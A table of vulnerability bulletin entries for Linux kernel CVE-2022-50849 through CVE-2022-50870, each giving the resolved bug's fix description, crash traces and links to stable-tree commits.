| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore: Avoid kcore oops by vmap()ing with VM_IOREMAP An oops can be induced by running 'cat /proc/kcore > /dev/null' on devices using pstore with the ram backend because kmap_atomic() assumes lowmem pages are accessible with __va(). Unable to handle kernel paging request at virtual address ffffff807ff2b000 Mem abort info: ESR = 0x96000006 EC = 0x25: DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 FSC = 0x06: level 2 translation fault Data abort info: ISV = 0, ISS = 0x00000006 CM = 0, WnR = 0 swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000081d87000 [ffffff807ff2b000] pgd=180000017fe18003, p4d=180000017fe18003, pud=180000017fe18003, pmd=0000000000000000 Internal error: Oops: 96000006 [#1] PREEMPT SMP Modules linked in: dm_integrity CPU: 7 PID: 21179 Comm: perf Not tainted 5.15.67-10882-ge4eb2eb988cd #1 baa443fb8e8477896a370b31a821eb2009f9bfba Hardware name: Google Lazor (rev3 - 8) (DT) pstate: a0400009 (NzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __memcpy+0x110/0x260 lr : vread+0x194/0x294 sp : ffffffc013ee39d0 x29: ffffffc013ee39f0 x28: 0000000000001000 x27: ffffff807ff2b000 x26: 0000000000001000 x25: ffffffc0085a2000 x24: ffffff802d4b3000 x23: ffffff80f8a60000 x22: ffffff802d4b3000 x21: ffffffc0085a2000 x20: ffffff8080b7bc68 x19: 0000000000001000 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: ffffffd3073f2e60 x14: ffffffffad588000 x13: 0000000000000000 x12: 0000000000000001 x11: 00000000000001a2 x10: 00680000fff2bf0b x9 : 03fffffff807ff2b x8 : 0000000000000001 x7 : 0000000000000000 x6 : 0000000000000000 x5 : ffffff802d4b4000 x4 : ffffff807ff2c000 x3 : ffffffc013ee3a78 x2 : 0000000000001000 x1 : ffffff807ff2b000 x0 : ffffff802d4b3000 Call trace: __memcpy+0x110/0x260 read_kcore+0x584/0x778 proc_reg_read+0xb4/0xe4 During early boot, memblock reserves the pages for the ramoops reserved memory node in DT that would otherwise be part of the direct lowmem mapping. Pstore's ram backend reuses those reserved pages to change the memory type (writeback or non-cached) by passing the pages to vmap() (see pfn_to_page() usage in persistent_ram_vmap() for more details) with specific flags. When read_kcore() starts iterating over the vmalloc region, it runs over the virtual address that vmap() returned for ramoops. In aligned_vread() the virtual address is passed to vmalloc_to_page() which returns the page struct for the reserved lowmem area. That lowmem page is passed to kmap_atomic(), which effectively calls page_to_virt() that assumes a lowmem page struct must be directly accessible with __va() and friends. These pages are mapped via vmap() though, and the lowmem mapping was never made, so accessing them via the lowmem virtual address oopses like above. Let's side-step this problem by passing VM_IOREMAP to vmap(). This will tell vread() to not include the ramoops region in the kcore. Instead the area will look like a bunch of zeros. The alternative is to teach kmap() about vmalloc areas that intersect with lowmem. Presumably such a change isn't a one-liner, and there isn't much interest in inspecting the ramoops region in kcore files anyway, so the most expedient route is taken for now. | 2025-12-30 | not yet calculated | CVE-2022-50849 | https://git.kernel.org/stable/c/1579bed1613802a323a1e14567faa95c149e105e https://git.kernel.org/stable/c/fdebcc33b663d2e8da937653ddfbfc1315047eaa https://git.kernel.org/stable/c/6d9460214e363e1f3d0756ee5d947e76e3e6f86c https://git.kernel.org/stable/c/4d3126f242a0090342ffe925c35fb4f4252b7562 https://git.kernel.org/stable/c/295f59cd2cdeed841850d02dddde3a122cbf6fc6 https://git.kernel.org/stable/c/ebc73c4f266281e2cad1a372ecd81572d95375b6 https://git.kernel.org/stable/c/69dbff7d2681c55a4d979fd9b75576303e69979f https://git.kernel.org/stable/c/2f82381d0681b10f9ddd27be98c27363b5a3cd1c https://git.kernel.org/stable/c/e6b842741b4f39007215fd7e545cb55aa3d358a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ipr: Fix WARNING in ipr_init() ipr_init() will not call unregister_reboot_notifier() when pci_register_driver() fails, which causes a WARNING. Call unregister_reboot_notifier() when pci_register_driver() fails. notifier callback ipr_halt [ipr] already registered WARNING: CPU: 3 PID: 299 at kernel/notifier.c:29 notifier_chain_register+0x16d/0x230 Modules linked in: ipr(+) xhci_pci_renesas xhci_hcd ehci_hcd usbcore led_class gpu_sched drm_buddy video wmi drm_ttm_helper ttm drm_display_helper drm_kms_helper drm drm_panel_orientation_quirks agpgart cfbft CPU: 3 PID: 299 Comm: modprobe Tainted: G W 6.1.0-rc1-00190-g39508d23b672-dirty #332 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.15.0-0-g2dd4b9b3f840-prebuilt.qemu.org 04/01/2014 RIP: 0010:notifier_chain_register+0x16d/0x230 Call Trace: <TASK> __blocking_notifier_chain_register+0x73/0xb0 ipr_init+0x30/0x1000 [ipr] do_one_initcall+0xdb/0x480 do_init_module+0x1cf/0x680 load_module+0x6a50/0x70a0 __do_sys_finit_module+0x12f/0x1c0 do_syscall_64+0x3f/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-30 | not yet calculated | CVE-2022-50850 | https://git.kernel.org/stable/c/020b66023712b1cc42c6ab8b76e4ec13efe4a092 https://git.kernel.org/stable/c/e965c4a60c1daa6e24355e35d78ca8e9f195196f https://git.kernel.org/stable/c/5debd337f534b122f7c5eac6557a41b5636c9b51 https://git.kernel.org/stable/c/eccbec017c95b9b9ecd4c05c6f5234d1487c72cc https://git.kernel.org/stable/c/f4ba143b04a17559f2c85e18b47db117f40d8cf3 https://git.kernel.org/stable/c/e59da172059f05c594fda03a9e8a3a0e1f5116c0 https://git.kernel.org/stable/c/8c739021b2022fbc40f71d3fa2e9162beef0c84a https://git.kernel.org/stable/c/4399a8632e5f8f1f695d91d992c7d418fb451f07 https://git.kernel.org/stable/c/e6f108bffc3708ddcff72324f7d40dfcd0204894 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vhost_vdpa: fix the crash in unmap a large memory While testing in vIOMMU, sometimes Guest will unmap very large memory, which will cause the crash. To fix this, add a new function vhost_vdpa_general_unmap(). This function will only unmap the memory that saved in iotlb. Call Trace: [ 647.820144] ------------[ cut here ]------------ [ 647.820848] kernel BUG at drivers/iommu/intel/iommu.c:1174! [ 647.821486] invalid opcode: 0000 [#1] PREEMPT SMP PTI [ 647.822082] CPU: 10 PID: 1181 Comm: qemu-system-x86 Not tainted 6.0.0-rc1home_lulu_2452_lulu7_vhost+ #62 [ 647.823139] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.15.0-29-g6a62e0cb0dfe-prebuilt.qem4 [ 647.824365] RIP: 0010:domain_unmap+0x48/0x110 [ 647.825424] Code: 48 89 fb 8d 4c f6 1e 39 c1 0f 4f c8 83 e9 0c 83 f9 3f 7f 18 48 89 e8 48 d3 e8 48 85 c0 75 59 [ 647.828064] RSP: 0018:ffffae5340c0bbf0 EFLAGS: 00010202 [ 647.828973] RAX: 0000000000000001 RBX: ffff921793d10540 RCX: 000000000000001b [ 647.830083] RDX: 00000000080000ff RSI: 0000000000000001 RDI: ffff921793d10540 [ 647.831214] RBP: 0000000007fc0100 R08: ffffae5340c0bcd0 R09: 0000000000000003 [ 647.832388] R10: 0000007fc0100000 R11: 0000000000100000 R12: 00000000080000ff [ 647.833668] R13: ffffae5340c0bcd0 R14: ffff921793d10590 R15: 0000008000100000 [ 647.834782] FS: 00007f772ec90640(0000) GS:ffff921ce7a80000(0000) knlGS:0000000000000000 [ 647.836004] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 647.836990] CR2: 00007f02c27a3a20 CR3: 0000000101b0c006 CR4: 0000000000372ee0 [ 647.838107] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 647.839283] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 647.840666] Call Trace: [ 647.841437] <TASK> [ 647.842107] intel_iommu_unmap_pages+0x93/0x140 [ 647.843112] __iommu_unmap+0x91/0x1b0 [ 647.844003] iommu_unmap+0x6a/0x95 [ 647.844885] vhost_vdpa_unmap+0x1de/0x1f0 [vhost_vdpa] [ 647.845985] vhost_vdpa_process_iotlb_msg+0xf0/0x90b [vhost_vdpa] [ 647.847235] ? _raw_spin_unlock+0x15/0x30 [ 647.848181] ? _copy_from_iter+0x8c/0x580 [ 647.849137] vhost_chr_write_iter+0xb3/0x430 [vhost] [ 647.850126] vfs_write+0x1e4/0x3a0 [ 647.850897] ksys_write+0x53/0xd0 [ 647.851688] do_syscall_64+0x3a/0x90 [ 647.852508] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 647.853457] RIP: 0033:0x7f7734ef9f4f [ 647.854408] Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 29 76 f8 ff 48 8b 54 24 18 48 8b 74 24 10 41 89 c8 [ 647.857217] RSP: 002b:00007f772ec8f040 EFLAGS: 00000293 ORIG_RAX: 0000000000000001 [ 647.858486] RAX: ffffffffffffffda RBX: 00000000fef00000 RCX: 00007f7734ef9f4f [ 647.859713] RDX: 0000000000000048 RSI: 00007f772ec8f090 RDI: 0000000000000010 [ 647.860942] RBP: 00007f772ec8f1a0 R08: 0000000000000000 R09: 0000000000000000 [ 647.862206] R10: 0000000000000001 R11: 0000000000000293 R12: 0000000000000010 [ 647.863446] R13: 0000000000000002 R14: 0000000000000000 R15: ffffffff01100000 [ 647.864692] </TASK> [ 647.865458] Modules linked in: rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs v] [ 647.874688] ---[ end trace 0000000000000000 ]--- | 2025-12-30 | not yet calculated | CVE-2022-50851 | https://git.kernel.org/stable/c/26b7400c89b81e2f6de4f224ba1fdf06f293de31 https://git.kernel.org/stable/c/8b258a31c2e8d4d4e42be70a7c6ca35a5afbff0d https://git.kernel.org/stable/c/e794070af224ade46db368271896b2685ff4f96b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7921: fix use after free in mt7921_acpi_read() Don't dereference "sar_root" after it has been freed. | 2025-12-30 | not yet calculated | CVE-2022-50852 | https://git.kernel.org/stable/c/3ed0b382cb36f6dac9f93b3a5533cfcd699409a5 https://git.kernel.org/stable/c/e7de4b4979bd8d313ec837931dde936653ca82ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSv4: Fix a credential leak in _nfs4_discover_trunking() | 2025-12-30 | not yet calculated | CVE-2022-50853 | https://git.kernel.org/stable/c/c6aca4c7ba8f6d40a0cfeeb09160dd8efdf97c64 https://git.kernel.org/stable/c/dfad5d5e7511933c2ae3d12a8131840074c5a73d https://git.kernel.org/stable/c/b247a9828f6607d41189fa6c2a3be754d33cae86 https://git.kernel.org/stable/c/e83458fce080dc23c25353a1af90bfecf79c7369 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: virtual_ncidev: Fix memory leak in virtual_nci_send() skb should be free in virtual_nci_send(), otherwise kmemleak will report memleak. Steps for reproduction (simulated in qemu): cd tools/testing/selftests/nci make ./nci_dev BUG: memory leak unreferenced object 0xffff888107588000 (size 208): comm "nci_dev", pid 206, jiffies 4294945376 (age 368.248s) hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<000000008d94c8fd>] __alloc_skb+0x1da/0x290 [<00000000278bc7f8>] nci_send_cmd+0xa3/0x350 [<0000000081256a22>] nci_reset_req+0x6b/0xa0 [<000000009e721112>] __nci_request+0x90/0x250 [<000000005d556e59>] nci_dev_up+0x217/0x5b0 [<00000000e618ce62>] nfc_dev_up+0x114/0x220 [<00000000981e226b>] nfc_genl_dev_up+0x94/0xe0 [<000000009bb03517>] genl_family_rcv_msg_doit.isra.14+0x228/0x2d0 [<00000000b7f8c101>] genl_rcv_msg+0x35c/0x640 [<00000000c94075ff>] netlink_rcv_skb+0x11e/0x350 [<00000000440cfb1e>] genl_rcv+0x24/0x40 [<0000000062593b40>] netlink_unicast+0x43f/0x640 [<000000001d0b13cc>] netlink_sendmsg+0x73a/0xbf0 [<000000003272487f>] __sys_sendto+0x324/0x370 [<00000000ef9f1747>] __x64_sys_sendto+0xdd/0x1b0 [<000000001e437841>] do_syscall_64+0x3f/0x90 | 2025-12-30 | not yet calculated | CVE-2022-50854 | https://git.kernel.org/stable/c/88e879c9f59511174ef0ab1a3c9c83e2dbf8a213 https://git.kernel.org/stable/c/2c46a9a5f0b1c7341aa67667801079f3ff571678 https://git.kernel.org/stable/c/e840d8f4a1b323973052a1af5ad4edafcde8ae3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: prevent leak of lsm program after failed attach In [0], we added the ability to bpf_prog_attach LSM programs to cgroups, but in our validation to make sure the prog is meant to be attached to BPF_LSM_CGROUP, we return too early if the check fails. This results in lack of decrementing prog's refcnt (through bpf_prog_put) leaving the LSM program alive past the point of the expected lifecycle. This fix allows for the decrement to take place. [0] https://lore.kernel.org/all/20220628174314.1216643-4-sdf@google.com/ | 2025-12-30 | not yet calculated | CVE-2022-50855 | https://git.kernel.org/stable/c/82b39df5ddb298daaf6dc504032ff7eb027fa106 https://git.kernel.org/stable/c/6a1504dd36cd9a0a69250d61da8bdb17b29f1fe8 https://git.kernel.org/stable/c/e89f3edffb860a0f54a9ed16deadb7a4a1fa3862 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix xid leak in cifs_ses_add_channel() Before return, should free the xid, otherwise, the xid will be leaked. | 2025-12-30 | not yet calculated | CVE-2022-50856 | https://git.kernel.org/stable/c/7286f875510486fdc2fc426b7c826262e2283a65 https://git.kernel.org/stable/c/847301f0ee1c29f34cc48547ce1071990f24969c https://git.kernel.org/stable/c/db2a8b6c17e128d91f35d836c569f4a6bda4471b https://git.kernel.org/stable/c/e909d054bdea75ef1ec48c18c5936affdaecbb2c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rapidio: rio: fix possible name leak in rio_register_mport() If device_register() returns error, the name allocated by dev_set_name() need be freed. It should use put_device() to give up the reference in the error path, so that the name can be freed in kobject_cleanup(), and list_del() is called to delete the port from rio_mports. | 2025-12-30 | not yet calculated | CVE-2022-50857 | https://git.kernel.org/stable/c/0a71344f99289250e4d5b8adbac76f444485c840 https://git.kernel.org/stable/c/117fede82e9d6ea3de30746d500eb5edc2eb8310 https://git.kernel.org/stable/c/a73a626c0510d203e369aeb26c4d6ec9c75af027 https://git.kernel.org/stable/c/1bbad5793f404cf218757e3beb600eca6080330f https://git.kernel.org/stable/c/97d9eb45ffa67ffa112a6659953321b8f7db0065 https://git.kernel.org/stable/c/a47de2fd3f88a7788be19f94ade72c2244a98045 https://git.kernel.org/stable/c/4ddbeae5f224d924cf0b12460dda88c7480aa452 https://git.kernel.org/stable/c/9abba4aa60874c5216fc8de7dededadc791de696 https://git.kernel.org/stable/c/e92a216d16bde65d21a3227e0fb2aa0794576525 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: alcor: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, the memory that allocated in mmc_alloc_host() will be leaked and it will lead a kernel crash because of deleting not added device in the remove path. So fix this by checking the return value and calling mmc_free_host() in the error path. | 2025-12-30 | not yet calculated | CVE-2022-50858 | https://git.kernel.org/stable/c/289c964fe182ce755044a6cd57698072e12ffa6f https://git.kernel.org/stable/c/4a6e5d0222804a3eaf2ea4cf893f412e7cf98cb2 https://git.kernel.org/stable/c/29c5b4da41f35108136d843c7432885c78cf8272 https://git.kernel.org/stable/c/48dc06333d75f41c2ce9ba954bc3231324b45914 https://git.kernel.org/stable/c/60fafcf2fb7ee9a4125dc9a86eeb9d490acf23e2 https://git.kernel.org/stable/c/e93d1468f429475a753d6baa79b853b7ee5ef8c0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: Fix the error length of VALIDATE_NEGOTIATE_INFO message Commit d5c7076b772a ("smb3: add smb3.1.1 to default dialect list") extend the dialects from 3 to 4, but forget to decrease the extended length when specific the dialect, then the message length is larger than expected. This maybe leak some info through network because not initialize the message body. After apply this patch, the VALIDATE_NEGOTIATE_INFO message length is reduced from 28 bytes to 26 bytes. | 2025-12-30 | not yet calculated | CVE-2022-50859 | https://git.kernel.org/stable/c/d0050ec3ebbcb3451df9a65b8460be9b9e02e80c https://git.kernel.org/stable/c/9312e04b6c6bc46354ecd0cc82052a2b3df0b529 https://git.kernel.org/stable/c/60480291c1fcafad8425d93f771b5bcc2bd398b4 https://git.kernel.org/stable/c/943eb0ede74ecd609fdfd3f0b83e0d237613e526 https://git.kernel.org/stable/c/fada9b8c95c77bb46b89e18117405bc90fce9f74 https://git.kernel.org/stable/c/e98ecc6e94f4e6d21c06660b0f336df02836694f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix memleak in alloc_ns() After changes in commit a1bd627b46d1 ("apparmor: share profile name on replacement"), the hname member of struct aa_policy is not valid slab object, but a subset of that, it can not be freed by kfree_sensitive(), use aa_policy_destroy() to fix it. | 2025-12-30 | not yet calculated | CVE-2022-50860 | https://git.kernel.org/stable/c/9a32aa87a25d800b2c6f47bc2749a7bfd9a486f3 https://git.kernel.org/stable/c/5f509fa740b17307f0cba412485072f632d5af36 https://git.kernel.org/stable/c/0250cf8d37bb5201a117177afd24dc73a1c81657 https://git.kernel.org/stable/c/12695b4b76d437b9c0182a6f7dfb2248013a9daf https://git.kernel.org/stable/c/e9e6fa49dbab6d84c676666f3fe7d360497fd65b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: Finish converting the NFSv2 GETACL result encoder The xdr_stream conversion inadvertently left some code that set the page_len of the send buffer. The XDR stream encoders should handle this automatically now. This oversight adds garbage past the end of the Reply message. Clients typically ignore the garbage, but NFSD does not need to send it, as it leaks stale memory contents onto the wire. | 2025-12-30 | not yet calculated | CVE-2022-50861 | https://git.kernel.org/stable/c/a20b0abab966a189a79aba6ebf41f59024a3224d https://git.kernel.org/stable/c/5030d4d2bf8b6f6f3d16401ab92a88bc5aa2377a https://git.kernel.org/stable/c/d5b867fd2d7f79630b1a2906a7bb4f4b75bf297a https://git.kernel.org/stable/c/2b825efb0577a32a872e872a869e0947cf9dd6d3 https://git.kernel.org/stable/c/ea5021e911d3479346a75ac9b7d9dcd751b0fb99 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: prevent decl_tag from being referenced in func_proto Syzkaller was able to hit the following issue: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 3609 at kernel/bpf/btf.c:1946 btf_type_id_size+0x2d5/0x9d0 kernel/bpf/btf.c:1946 Modules linked in: CPU: 0 PID: 3609 Comm: syz-executor361 Not tainted 6.0.0-syzkaller-02734-g0326074ff465 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/22/2022 RIP: 0010:btf_type_id_size+0x2d5/0x9d0 kernel/bpf/btf.c:1946 Code: ef e8 7f 8e e4 ff 41 83 ff 0b 77 28 f6 44 24 10 18 75 3f e8 6d 91 e4 ff 44 89 fe bf 0e 00 00 00 e8 20 8e e4 ff e8 5b 91 e4 ff <0f> 0b 45 31 f6 e9 98 02 00 00 41 83 ff 12 74 18 e8 46 91 e4 ff 44 RSP: 0018:ffffc90003cefb40 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000002 RCX: 0000000000000000 RDX: ffff8880259c0000 RSI: ffffffff81968415 RDI: 0000000000000005 RBP: ffff88801270ca00 R08: 0000000000000005 R09: 000000000000000e R10: 0000000000000011 R11: 0000000000000000 R12: 0000000000000000 R13: 0000000000000011 R14: ffff888026ee6424 R15: 0000000000000011 FS: 000055555641b300(0000) GS:ffff8880b9a00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000f2e258 CR3: 000000007110e000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> btf_func_proto_check kernel/bpf/btf.c:4447 [inline] btf_check_all_types kernel/bpf/btf.c:4723 [inline] btf_parse_type_sec kernel/bpf/btf.c:4752 [inline] btf_parse kernel/bpf/btf.c:5026 [inline] btf_new_fd+0x1926/0x1e70 kernel/bpf/btf.c:6892 bpf_btf_load kernel/bpf/syscall.c:4324 [inline] __sys_bpf+0xb7d/0x4cf0 kernel/bpf/syscall.c:5010 __do_sys_bpf kernel/bpf/syscall.c:5069 [inline] __se_sys_bpf kernel/bpf/syscall.c:5067 [inline] __x64_sys_bpf+0x75/0xb0 kernel/bpf/syscall.c:5067 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f0fbae41c69 Code: 28 c3 e8 2a 14 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffc8aeb6228 EFLAGS: 00000246 ORIG_RAX: 0000000000000141 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f0fbae41c69 RDX: 0000000000000020 RSI: 0000000020000140 RDI: 0000000000000012 RBP: 00007f0fbae05e10 R08: 0000000000000000 R09: 0000000000000000 R10: 00000000ffffffff R11: 0000000000000246 R12: 00007f0fbae05ea0 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 </TASK> Looks like it tries to create a func_proto which return type is decl_tag. For the details, see Martin's spot on analysis in [0]. 0: https://lore.kernel.org/bpf/CAKH8qBuQDLva_hHxxBuZzyAcYNO4ejhovz6TQeVSk8HY-2SO6g@mail.gmail.com/T/#mea6524b3fcd6298347432226e81b1e6155efc62c | 2025-12-30 | not yet calculated | CVE-2022-50862 | https://git.kernel.org/stable/c/e9dbb4c539d058852b76937dcd7347d3f38054f2 https://git.kernel.org/stable/c/ea68376c8bed5cd156900852aada20c3a0874d17 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtw89: free unused skb to prevent memory leak This avoid potential memory leak under power saving mode. | 2025-12-30 | not yet calculated | CVE-2022-50863 | https://git.kernel.org/stable/c/d4b4f6ff8ff1b87d25977423cf38fb61744d0023 https://git.kernel.org/stable/c/216c59b66f2d0c428a4fdaa24dc28cd6be4a2bf6 https://git.kernel.org/stable/c/eae672f386049146058b9e5d3d33e9e4af9dca1d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix shift-out-of-bounds due to too large exponent of block size If field s_log_block_size of superblock data is corrupted and too large, init_nilfs() and load_nilfs() still can trigger a shift-out-of-bounds warning followed by a kernel panic (if panic_on_warn is set): shift exponent 38973 is too large for 32-bit type 'int' Call Trace: <TASK> dump_stack_lvl+0xcd/0x134 ubsan_epilogue+0xb/0x50 __ubsan_handle_shift_out_of_bounds.cold.12+0x17b/0x1f5 init_nilfs.cold.11+0x18/0x1d [nilfs2] nilfs_mount+0x9b5/0x12b0 [nilfs2] ... This fixes the issue by adding and using a new helper function for getting block size with sanity check. | 2025-12-30 | not yet calculated | CVE-2022-50864 | https://git.kernel.org/stable/c/ec93b5430ec0f60877a5388bb023d60624f9ab9f https://git.kernel.org/stable/c/8b6ef451b5701b37d9a5905534595776a662edfc https://git.kernel.org/stable/c/ddb6615a168f97b91175e00eda4c644741cf531c https://git.kernel.org/stable/c/a16731fa1b96226c75bbf18e73513b14fc318360 https://git.kernel.org/stable/c/ebeccaaef67a4895d2496ab8d9c2fb8d89201211 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: fix a signed-integer-overflow bug in tcp_add_backlog() The type of sk_rcvbuf and sk_sndbuf in struct sock is int, and in tcp_add_backlog(), the variable limit is caculated by adding sk_rcvbuf, sk_sndbuf and 64 * 1024, it may exceed the max value of int and overflow. This patch reduces the limit budget by halving the sndbuf to solve this issue since ACK packets are much smaller than the payload. | 2025-12-30 | not yet calculated | CVE-2022-50865 | https://git.kernel.org/stable/c/9d04b4d0feee12bce6bfe37f30d8e953d3c30368 https://git.kernel.org/stable/c/4f23cb2be530785db284a685d1b1c30224d8a538 https://git.kernel.org/stable/c/a85d39f14aa8a71e29cfb5eb5de02878a8779898 https://git.kernel.org/stable/c/28addf029417d53b1df062b4c87feb7bc033cb5f https://git.kernel.org/stable/c/ec791d8149ff60c40ad2074af3b92a39c916a03f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: pxa: fix null-pointer dereference in filter() kasprintf() would return NULL pointer when kmalloc() fail to allocate. Need to check the return pointer before calling strcmp(). | 2025-12-30 | not yet calculated | CVE-2022-50866 | https://git.kernel.org/stable/c/3ec75e0ea9550b8f2e531172f2e67ba9d5227ec3 https://git.kernel.org/stable/c/5b510a82740d2a42a75b5661b402bcaf8ae22cd5 https://git.kernel.org/stable/c/0abd1d78317a3a2dfe00b203fbf14ee7df537e0a https://git.kernel.org/stable/c/a8baccb79de2f48a2083d51febf627eb50ce1898 https://git.kernel.org/stable/c/21a1409e8cf73053b54f7860548e3043dfa351a9 https://git.kernel.org/stable/c/83baa509396a742e0ce145b09fde1ce0a948f49a https://git.kernel.org/stable/c/9fb9b3b67a5b8669296d6372cd901ef86557e6f6 https://git.kernel.org/stable/c/21b92cf41952577a95bfa430e39478cbd66e42a7 https://git.kernel.org/stable/c/ec7bf231aaa1bdbcb69d23bc50c753c80fb22429 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/a6xx: Fix kvzalloc vs state_kcalloc usage adreno_show_object() is a trap! It will re-allocate the pointer it is passed on first call, when the data is ascii85 encoded, using kvmalloc/ kvfree(). Which means the data *passed* to it must be kvmalloc'd, ie. we cannot use the state_kcalloc() helper. This partially reverts commit ec8f1813bf8d ("drm/msm/a6xx: Replace kcalloc() with kvzalloc()"), but adds the missing kvfree() to fix the memory leak that was present previously. And adds a warning comment. Patchwork: https://patchwork.freedesktop.org/patch/507014/ | 2025-12-30 | not yet calculated | CVE-2022-50867 | https://git.kernel.org/stable/c/4b1bbc0571a5d7ee10f754186dc3d619b9ced5c1 https://git.kernel.org/stable/c/83d18e9d9c0150d98dc24e3642ea93f5e245322c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwrng: amd - Fix PCI device refcount leak for_each_pci_dev() is implemented by pci_get_device(). The comment of pci_get_device() says that it will increase the reference count for the returned pci_dev and also decrease the reference count for the input pci_dev @from if it is not NULL. If we break for_each_pci_dev() loop with pdev not NULL, we need to call pci_dev_put() to decrease the reference count. Add the missing pci_dev_put() for the normal and error path. | 2025-12-30 | not yet calculated | CVE-2022-50868 | https://git.kernel.org/stable/c/f1c97f72ffd504f49882774e2ab689d982dc7afc https://git.kernel.org/stable/c/526c316948819d3ecd2bb20fe5e2580c51a1b760 https://git.kernel.org/stable/c/e246f5eff26055bdcb61a2cc99c50af72a19680f https://git.kernel.org/stable/c/1199f8e02941b326c60ab71a63002b7c80e38212 https://git.kernel.org/stable/c/5998e5c30e839f73e62cb29e0d9617b0d16ccba3 https://git.kernel.org/stable/c/2b79a5e560779b35e1164d57ae35c48b43373082 https://git.kernel.org/stable/c/cb348c7908631dd9f60083a0a1542eab055d3edf https://git.kernel.org/stable/c/2e10ecd012ae2b2a374b34f307e9bc1e6096c03d https://git.kernel.org/stable/c/ecadb5b0111ea19fc7c240bb25d424a94471eb7d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Fix slab-out-of-bounds in r_page When PAGE_SIZE is 64K, if read_log_page is called by log_read_rst for the first time, the size of *buffer would be equal to DefaultLogPageSize(4K).But for *buffer operations like memcpy, if the memory area size(n) which being assigned to buffer is larger than 4K (log->page_size(64K) or bytes(64K-page_off)), it will cause an out of boundary error. Call trace: [...] kasan_report+0x44/0x130 check_memory_region+0xf8/0x1a0 memcpy+0xc8/0x100 ntfs_read_run_nb+0x20c/0x460 read_log_page+0xd0/0x1f4 log_read_rst+0x110/0x75c log_replay+0x1e8/0x4aa0 ntfs_loadlog_and_replay+0x290/0x2d0 ntfs_fill_super+0x508/0xec0 get_tree_bdev+0x1fc/0x34c [...] Fix this by setting variable r_page to NULL in log_read_rst. | 2025-12-30 | not yet calculated | CVE-2022-50869 | https://git.kernel.org/stable/c/ed686e7a26dd19ae6b46bb662f735acfa88ff7bc https://git.kernel.org/stable/c/bf86a640a34947d92062996e1a75b9cd9d83dd19 https://git.kernel.org/stable/c/6d076293e5bffdf897ea5f975669206e09beed6a https://git.kernel.org/stable/c/ecfbd57cf9c5ca225184ae266ce44ae473792132 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/rtas: avoid device tree lookups in rtas_os_term() rtas_os_term() is called during panic. Its behavior depends on a couple of conditions in the /rtas node of the device tree, the traversal of which entails locking and local IRQ state changes. If the kernel panics while devtree_lock is held, rtas_os_term() as currently written could hang. Instead of discovering the relevant characteristics at panic time, cache them in file-static variables at boot. Note the lookup for "ibm,extended-os-term" is converted to of_property_read_bool() since it is a boolean property, not an RTAS function token. [mpe: Incorporate suggested change from Nick] | 2025-12-30 | not yet calculated | CVE-2022-50870 | https://git.kernel.org/stable/c/e23822c7381c59d9e42e65771b6e17c71ed30ea7 https://git.kernel.org/stable/c/06a07fbb32b3a23eec20a42b1e64474da0a3b33e 